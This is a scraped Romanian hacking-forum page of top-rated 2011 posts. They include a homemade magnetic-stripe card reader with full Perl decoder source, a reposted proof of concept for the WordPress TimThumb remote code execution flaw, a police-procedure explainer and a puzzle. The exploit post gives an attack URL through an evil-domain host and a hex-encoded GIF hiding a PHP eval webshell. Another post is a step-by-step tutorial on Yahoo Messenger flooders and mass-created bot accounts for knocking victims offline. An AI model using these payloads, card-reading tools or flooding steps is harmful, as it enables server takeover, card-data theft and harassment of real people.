Leaderboard
Popular Content
Showing content with the highest reputation on 08/03/11 in all areas
-
2 points
-
2 points
-
Intotdeauna am fost interesat de cum si ce date sunt stocate pe banda magnetica a diferitor carduri, asa ca am decis sa creez un cititor din un vechi casetofon. Hardware Partea hardware pentru acest proiect e destul de simpla. Banda magnetica e citita folosind un cap magnetic de la un vechi mono casetofon si cateva componente pentru a amplifica semnalul in vederea citirii mai usoare. Acesta e conectat la mufa pentru microfon a PC-ului. Puterea pentru amplificator e de asemenea luata din inputul pentru microfon, notebook-ul meu outputeaza cam 3V acolo. Pentru mai multe detalii, uitate la schema amplificatorului de AICI Poza cu cititorul : http://i50.tinypic.com/21o29ax.jpg Software . Prima oara am incercat softurile de AICI si de AICI , dar nicicare dintre acestea doua nu au fost prea stabile (pentru mine), asa ca m-am decis sa imi scriu propriul decoder. Inainte sa citesti mai departe iti recomand sa inveti despre cum sunt datele codate pe banda magnetica. Decoderul meu incearca prima oara sa masoare latimea pulsului bitilor initiali, apoi foloseste acea marime ca referinta pentru decodarile urmatoare. Asta se face masurand grosimea tuturor pulsurilor urmatoare si comparandule cu ultimul puls cu grosimea zero. Daca doua grosimi sunt mai aproape de pulsul zero decat de primul puls, pulsurile sunt decodate ca 1. Altfel primul puls e interpretat ca 0. In final, pulsul zero este schimbat folosind un factor dat la ultimul puls masurat pentru a lucra cu viteze diferite de lovire. Exemplu Sa spunem ca decoderul detecteaza urmatoarele grosimi ale pulsurilor : 91, 101, 90, 55, 44, 51, 45, 98, 48, 49, 91, 101 1) Prima grosime (91) este folosita ca pulsul zero ( sa-l numim zp) 2) Apoi zp-ul este comparat cu urmatorul puls (101; |91-101| = 10) si suma urmatorilor 2 (101+90 = 191; |91-191| = 100) 3) Dupa cum se poate vedea, grosimea e mai aproape de zp (10<100) deci pulsul e decodat ca 0 4) In cele din urma valoarea lui zp este ajustata la noua grosime de puls folosind un factor definit f (am ales 0.2 aici, dupa cateva teste initiale) zp_nou = zp - ((zp - grosime) * f) zp_nou = 91-((91-101)*0.2)=93 5) Urmatorul puls e decodat tot ca acesta, deci nu voi explica din nou. zp_nou = 93-((93-90)*0.2)=92 (rotunjit la cea mai mica valoare) 6) Apoi zp e comparat cu urmatoarea grosime (55; |92-55|=37) si suma urmatoarelor doua (55+44=99; |92-99|=7) 7) Acum suma urmatoarelor doua pulsuri e mai aproape de zp (7<37) deci cele doua pulsuri sunt decodate ca 1 8) zp_nou=92-((92-(55+44))*0.2)=93 9) Acum totul continua ca inainte exceptand faptul ca trebuie sa folosesti 51 si 45 in loc de 44 si 51 (trebuie sa avansezi cu 2 numere in vector). Folosire Trebuie sa ai sox pentru a functiona. Decodeaza un fisier .wav inregistrat - track 1 sox fisier.wav -r 48000 -t dat -q - | ./bifaze.pl 1 Decodeaza un fisier live - track 2 sox rec -r 48000 -t dat -q - | ./bifaze.pl 2 Sursa decoderului meu - bifaze.pl #!/usr/bin/perl -w # Written by Hertz <ownage [dot] hertz [at] gmail.com> use strict; my $track = 2; $track = 1 if((scalar(@ARGV) == 1) && ($ARGV[0] eq '1')); my $threshold_1 = 0.2; my $maxlen_1 = 150; my $adoptrate_1 = 0.2; my $smalldiff_1 = 0.1; my $threshold_2 = 0.2; my $maxlen_2 = 350; my $adoptrate_2 = 0.2; my $smalldiff_2 = 0.1; my $dbg_lens = 0; my $dbg_dec = 0; ############################################################################### my $chars_1 = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_'; my $charlen_1 = 6; my $chars_2 = '0123456789:;<=>?'; my $charlen_2 = 4; ############################################################################### $| = 1; my $threshold = $threshold_1; my $maxlen = $maxlen_1; my $adoptrate = $adoptrate_1; my $smalldiff = $smalldiff_1; my $chars = $chars_1; my $charlen = $charlen_1; if($track == 2) { $threshold = $threshold_2; $maxlen = $maxlen_2; $adoptrate = $adoptrate_2; $smalldiff = $smalldiff_2; $chars = $chars_2; $charlen = $charlen_2; } my $slope = 1; my $old = 0; my $data = 0; my $olddata = 0; my $init = 1; my $mode = 0; my $count = 0; my $len = 0; my $curlen = 0; my $oldlen = 0; my $bitmode = 0; my $chk = 0; my $complete = 1; my $celllen = 0; my $str = ''; sub parity_ok { my $charlen = shift; my $c = shift; my $one = 0; for(my $j = $charlen - 1;$j >= 0;$j--) { $one++ if(substr($c, $j, 1) eq '1'); } $one++ if(substr($c, $charlen, 1) eq '1'); return ($one % 2) == 1; } sub xtract_char { my $charlen = shift; my $c = shift; my $x = 0; for(my $j = $charlen - 1;$j >= 0;$j--) { $x <<= 1; $x |= 1 if(substr($c, $j, 1) eq '1'); } return $x; } sub decode_char { my $charlen = shift; my $chars = shift; my $str = shift; return ('x', 0) if(!parity_ok($charlen, $str)); my $x = xtract_char($charlen, $str); return ('y', 0) if($x >= length($chars)); return (substr($chars, $x, 1), $x); } while(<STDIN>) { chop; next if(/^;/); next unless(/([+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?) +([+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?)/); my ($t, $y) = ($1, $2); my $s = $slope; if($y > $threshold) { $s = 1; } elsif($y < (-1 * $threshold)) { $s = -1; } if($slope != $s) { $slope = $s; if($data) { $data = 0; } else { $data = 1; } } if($init) { $len = 0; $olddata = $data; $init = 0; $mode = 0; $bitmode = 0; } else { my $lenchange = 0; my $gotbit = 0; if($len > $maxlen) { $mode = 0; $bitmode = 0; $init = 1; if(!$complete) { print " TIMEOUT\n"; $complete = 1; } } else { if($olddata != $data) { print "$len\n" if($dbg_lens); $oldlen = $len; $curlen = $len; $len = 0; $lenchange = 1; } else { $len++; } } if($lenchange) { if($mode == 0) { $count = 3; $mode++; } elsif($mode == 1) { if($count <= 0) { $str = ''; $mode++; } else { $count--; } } elsif($mode == 2) { my $c = $oldlen; my $n = $curlen; my $d0 = abs($celllen - $c); my $d1 = abs($celllen - ($c + $n)); my $d = 0; print abs($d0 - $d1) . " " . ($celllen * $smalldiff) . "\n" if($dbg_dec); if(abs($d0 - $d1) > ($celllen * $smalldiff)) { if($d0 < $d1) { $d = 0; } else { $d = 1; } } else { $d = 1; } $str .= $d; $gotbit = 1; print "$c $n $d0 $d1 $celllen $d\n" if($dbg_dec); if($d == 0) { $celllen -= int(($celllen - $c) * $adoptrate); } else { $celllen -= int(($celllen - ($c + $n)) * $adoptrate); $mode++ } print "-> $celllen\n" if($dbg_dec); } elsif($mode == 3) { $mode--; } } if($gotbit) { if($bitmode == 0) { $complete = 0; if($str eq '1') { $bitmode++; $chk = 0; } else { $str = ''; } } elsif($bitmode == 1) { if(length($str) >= ($charlen + 1)) { my $c = substr($str, 0, $charlen + 1); $str = substr($str, $charlen + 1); print "p" if(!parity_ok($charlen, $c)); my ($ch, $x) = decode_char($charlen, $chars, $c); $chk ^= $x; print "$ch"; $bitmode++ if($ch eq '?'); } } elsif($bitmode == 2) { if(length($str) >= ($charlen + 1)) { my $c = substr($str, 0, $charlen + 1); $str = substr($str, $charlen + 1); print "p" if(!parity_ok($charlen, $c)); my ($ch, $x) = decode_char($charlen, $chars, $c); $chk ^= $x; if($chk) { print " ERROR\n"; } else { print " OK\n"; } $complete = 1; $bitmode = 0; } } } } $olddata = $data; $old = $y; }1 point
-
Intr-un episod era o masinarie care schimba mintea/creierul psihic intre 2 corpuri, dar o pereche de corpuri care au facut schimb nu mai pot face schimb la loc. De cate persoane este nevoie minim pentru a aduce la loc mintea ce corespunde fiecarui corp ? Daca avem persoanele A B C, si A schimba cu B atunci acestea 2 nu mai pot schimba la loc, dar oricare din A si B pot schimba cu C. Raspunsul se gaseste aproape imediat, dar vreau o demonstratie matematica . Hint: permutari.1 point
-
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) [url]http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php[/url] Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. PoC File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif Sursa1 point
-
In realitate treaba sta cam asa. Un caz de genul asta se instrumenteaza (dupa manual) in felul urmator. Exista o persoana numita X acuzata de actiuni frauduloase asupra unor sisteme informatice (in nomenclatorul juritic nu exista terminologia de Hacking). 1) este luata legatura cu RECLAMANTUL, de la care se preleveaza datele incriminatoare (logouri de sistem, etc) 2)Se contacteaza ISP-ul care are IP-ul respectv in banda sa. Se analizeaza logourile de securitate de la ISP. Fecare firma care ofera IP dinamic este obligata sa pastreze 30 de zile logourile despre ip-urile online (ce ip s-a conectat, la ce ora, si in ce locatie) Prin lege ISP-ul ESTE OBLIGAT sa poata afla ce locatie are ficare IP Ex. 79.112.79.79 online at 12:20 PM la 12:20 79.112.79.79 a fost alocat echipamentului cu mac-ul AA:AA:AA:AA:AA Echipament prezent la adresa BLABLABLA. Ip-ul a fost alocat pe portul 3 Portul 3 este alocat Userului BV312312312 Numit Popa Popescu. Daca Popa Popescu NU LOCUIESTE LA ADRESA, Politia va verifica cine locuieste la adresa respectiva, si ce legaturi are cu POPA. Daca nu exista legaturi, Persoana domiciliata la adresa de unde este accesat IP-ul va fi considerata suspect principal. Daca persoana ARE legaturi cu POPA, va deveni suspect, dar POPA va fi suspectul Principal. 3) Politia preia datele si impreuna cu datele de la reclamant intocmeste un dosar DE URMARIRE. Daca reclamantul depune plangere penala, acea urmarire va fi URMARIRE PENALA. Daca este o plangere simpla (civila) Atunci si urmarirea va fi CIVILA 4) Magistratul sau procurorul de caz va inainta dosarul la judecatorie, de unde se obtine MANDAT DE PERCHEZITIE sau MANDAT DE RETINERE. 5a) In cazul mandatului de PERCHEZITIE. Se face descinderea la domiciliul SUSPECTULUI. Se preleveaza probe si se ridica sistemele de calcul ale suspectului PT ANALIZA. Suspectul este transportat la sectie pt interogatoriu. NU VA FI RETINUT MAI MULT DE 12 ORE. SUSPECTUL POATE CERE UN AVOCAT. 5b) In cazul Mandatului de RETINERE Se face ca la punctul de mai sus, dar SUSPECTUL ESTE RETINUT PE TERMEN DE 24 DE ORE. Acum se poate obtine MANDAT DE RETINERE PREVENTIVA pe terment de 29 de ZILE. 6) Revenim la ANALIZA SISTEMULUI INFORMATIC. Analiza se face in prima faza PE HDD. DAca el nu exista in sistem, sau nu se gasesc dovezi concludente, se compara Logourile de la ISP (unde se gaseste MAC-ul placii de retea care si-a luat ip-ul cu cre s-a comis infractiunea). Daca MAC-ul nu corespunde cu adresa inscrisa de producator (fiecare producator/importator are OBLIGATIA de a nota adresa fizica a fiecarei placi de retea comericalizate), se noteaza ca dovada incriminatorie. Daca NU se gaseste o placa de retea in sistemul de calcul, sau NU EXISTA SISTEM DE CALCUL la adresa descinderii, se va instrumenta cazul in functie de datele obtinute de la ISP si reclamant. Daca NU SE POATE DOVEDI ca suspectul a avut in prorpietate personala un sistem de calcul la adresa respectiva (de unde s-a efectuat infractiunea) suspectul este eliberat si procurorul intocmeste inchiderea dosarului cu NUP (NEINCEPEREA URMARII PENALE). V-am exemplificat un caz simplu, predat la scoala, DAR POATE VARIA IN FUNCTIE DE DOVEZI SI CIRCUMSTANTE. In mare trebuie SA RETINETI PASII JURIDICI DE ISTRUMETARE A UNUI CAZ DE PIRATERIE/INFRACTIUNE INFORMATICA.1 point
-
pai cine itzi da tzie un cod de 5 euro si u sai dai 5 usd? nai sa vezi-1 points
-
@Ghiaor esti literalmente prea prost ca sa fi insultat. Daca nu sti de ce te-am facut esti si mai rau. Te voi ignora ca nu am pus anuntul sa dezbat preturi cu non clienti.-1 points
-
[+] Am vazut ca majoritatea userilor noi care apar pe forum cauta asta si am vazut ca mai este un topic in care toti scriu si nu le raspunde nimeni la intrebari si mai mult de atat buti nu sunt buni ceea ce ii face pe ei sa creada ca programul nu e bun. O sa fac eu sa zicem "tutorialul" acesta pentru userii care nu stiu ce au de facut. [+] Pentru inceput avem nevoie de o arhiva cu cateva "floodere" (sunt cele pe care le folosesc si eu ) Arhiva contine 3 foldere : - Flooderi - IR IDMakerV3.2 - Multi Yahoo Boots Checker La Flooderi sunt programele , La IR IDMaker V3.2 este un program cu care puteati realiza buti foarte usor ,si la Multi Yahoo Boots Checker se afla un program cu care puteti scana lista voastra de buti si sa salvati buti care mai merg si sa scapati de cei care numai merg. [+] Intrati la Flooderi si deschideti pe rand doar : -Big Killer Release -Fusion Ym v2 -GMC Booters Restul de 2 le lasati acolo pentru ca nu merg si mi-a fost lene sa le sterg..^^ La toate cele 3 programe o sa vedeti ca va apare Load la fiecare dintre ele. Dati la Load pe rand la fiecare si selectati fisierul .txt din folderul Flooderi numit dEv1L Boots buni. Faceti la fel la toate si dupaia dati la toate log in. Asteptati putin sa se incarce toate . O sa ia ceva timp sa se incarce..Nu mult.Cam 45 de secunde . Dupa ce s-au incarcat buti bagati idiul acolo la Victim si dati in felul urmator. La Big Killer Release dati Flood ,la Fusion Ym dati Fast YM Flood iar la Gmc booters dati Boot 1. Acum victima va fi scoasa de pe mess.Nu dureaza foarte mult ..depinde de viteza netului. [+]Cam asta e tot ca sa flodati pe cineva. [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. [+] Daca "tutorialul" meu v-a fost de ajutor apasati pe butonul REP de sub avatarul meu. Sper ca am fost de folos noilor membri care cautau asta.-1 points